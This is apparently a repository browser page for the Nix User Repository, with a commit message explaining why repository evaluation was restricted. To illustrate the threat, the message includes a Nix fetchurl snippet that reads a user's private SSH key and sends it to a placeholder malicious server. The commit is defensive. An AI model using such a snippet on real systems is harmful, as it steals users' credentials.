6.NUR

nix/6.NUR

History

Jörg Thalheim a50860fcbb restrict evaluation of repos It should be save for users to evaluate nix code. Therefore we restrict evaluation of repositories. Otherwise an attacker could leak confidential data, i.e.: fetchurl { url = "https://malicious-server.com/log-key?content=" + (builtins.readFile "../../.ssh/id_rsa"); sha256 = "43c2c9e5e7a16b6c88ba3088a9bfc82f7db8e13378be7c78d6c14a5f8ed05afd"; }	2018-07-01 15:50:39 +01:00
..
format_repos_manifest	test & automate format of repos.json	2018-07-01 13:56:51 +01:00
update.py	restrict evaluation of repos	2018-07-01 15:50:39 +01:00

Jörg Thalheim a50860fcbb restrict evaluation of repos

It should be save for users to evaluate nix code.
Therefore we restrict evaluation of repositories.
Otherwise an attacker could leak confidential data, i.e.:

fetchurl {
  url = "https://malicious-server.com/log-key?content=" + (builtins.readFile "../../.ssh/id_rsa");
  sha256 = "43c2c9e5e7a16b6c88ba3088a9bfc82f7db8e13378be7c78d6c14a5f8ed05afd";
}

2018-07-01 15:50:39 +01:00

format_repos_manifest

test & automate format of repos.json

2018-07-01 13:56:51 +01:00

update.py

restrict evaluation of repos

2018-07-01 15:50:39 +01:00